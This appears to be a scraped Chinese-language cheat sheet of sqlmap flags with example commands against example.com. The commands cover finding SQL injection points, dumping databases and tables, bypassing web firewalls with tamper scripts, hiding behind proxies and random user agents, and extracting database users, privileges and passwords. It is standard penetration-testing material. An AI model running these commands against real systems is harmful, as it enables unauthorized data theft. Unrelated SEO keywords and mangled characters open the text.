iis怎么建设网站,许昌网络推广哪家好,ueditor 转wordpress,手机网站开发 宽度sqlmap的使用笔记 文章目录 sqlmap的使用笔记1. 目标2. 脱库2.1. 脱库#xff08;补充#xff09; 3. 其他3.1. 其他#xff08;补充#xff09; 1. 目标
操作作用必要示例-u指定URL#xff0c;检测注入点sqlmap -u http://example.com/?id1-m指定txt#xff0c;里面有…sqlmap的使用笔记 文章目录 sqlmap的使用笔记1. 目标2. 脱库2.1. 脱库补充 3. 其他3.1. 其他补充 1. 目标
操作作用必要示例-u指定URL检测注入点sqlmap -u http://example.com/?id1-m指定txt里面有很多个URLsqlmap -m urls.txt-r检测POST请求的注入点使用BP等工具抓包将http请求内容保存到txt文件中sqlmap -r request.txt–cookie指定cookie的值单/双引号包裹sqlmap -u http://example.com?idx --cookie session_id1234-D指定数据库sqlmap -u http://example.com/?id1 -D mydatabase-T指定表sqlmap -u http://example.com/?id1 -D mydatabase -T mytable-C指定字段sqlmap -u http://example.com/?id1 -D mydatabase -T mytable -C mycolumn
2. 脱库
操作作用必要示例-b获取数据库版本sqlmap -u url -b–current-db当前数据库sqlmap -u url --current-db–dbs获取数据库sqlmap -u url --dbs–tables获取表sqlmap -u url --tables -D database–columns获取字段sqlmap -u url --columns -D database -T table–schema字段类型sqlmap -u url --schema -D database–dump获取数据sqlmap -u url --dump -D database -T table–start开始的行sqlmap -u url --start1 -D database -T table–stop结束的行sqlmap -u url --stop10 -D database -T table–search搜索库表字段sqlmap -u url --search -C column–tamperWAF绕过sqlmap -u url --tampertamper_script
2.1. 脱库补充
–current-db获取的是当前的数据库名称而–dbs获取的是所有的数据库名称WAF 指的是“Web Application Firewall”即网络应用防火墙例如sqlmap -u ‘http://xx/?id1’ --tamper ‘space2comment.py’sqlmap有很多内置的绕过脚本(脚本按照用途命名)在/usr/share/sqlmap/tamper/目录下–search如果你正在寻找包含特定关键字的列这个命令将列出所有包含该关键字的列的名称及其所属的表和数据库。
3. 其他
操作作用必要示例–batch不再询问确认sqlmap -u http://example.com/?id1 --batch–methodGET指定请求方式sqlmap -u http://example.com/?id1 --methodGET–random-agent随机UAsqlmap -u http://example.com/?id1 --random-agent–user-agent自定义UAsqlmap -u http://example.com/?id1 --user-agent MyUserAgent–referer自定义referersqlmap -u http://example.com/?id1 --referer http://referer.com–proxy“123”代理sqlmap -u http://example.com/?id1 --proxyhttp://123.123.123.123:8080–threads 10线程数1~10sqlmap -u http://example.com/?id1 --threads 10–level1测试等级1~5sqlmap -u http://example.com/?id1 --level1–risk1风险等级0~3sqlmap -u http://example.com/?id1 --risk1
3.1. 其他补充
测试等级这个等级决定了 SQLMap 将尝试的测试数量和类型。较高的等级意味着 SQLMap 将执行更多类型的测试这些测试可能更复杂有时也更具侵入性。例如在较低的等级上SQLMap 可能只测试最常见的注入类型而在较高等级上它会尝试更多不常见的或复杂的注入技术。风险等级风险等级影响测试的侵入性。较高的风险等级可能会运行更具侵入性的测试这些测试可能会对数据库造成更大的负担或风险。例如一些高风险测试可能包括执行实际的数据库操作如更新或删除数据而低风险测试则尽量避免这种潜在的破坏性操作。
操作作用必要示例-a自动识别和测试所有参数sqlmap -u http://example.com/?id1 -a–current-user获取当前数据库用户sqlmap -u http://example.com/?id1 --current-user–is-dbs检测可能的数据库sqlmap -u http://example.com/?id1 --is-dbs–users枚举数据库服务器上的用户sqlmap -u http://example.com/?id1 --users–privileges枚举数据库用户的权限sqlmap -u http://example.com/?id1 --privileges–passwords尝试获取数据库用户的密码sqlmap -u http://example.com/?id1 --passwords–hostname获取数据库服务器的主机名sqlmap -u http://example.com/?id1 --hostname–statements捕获并显示SQL语句sqlmap -u http://example.com/?id1 --statements
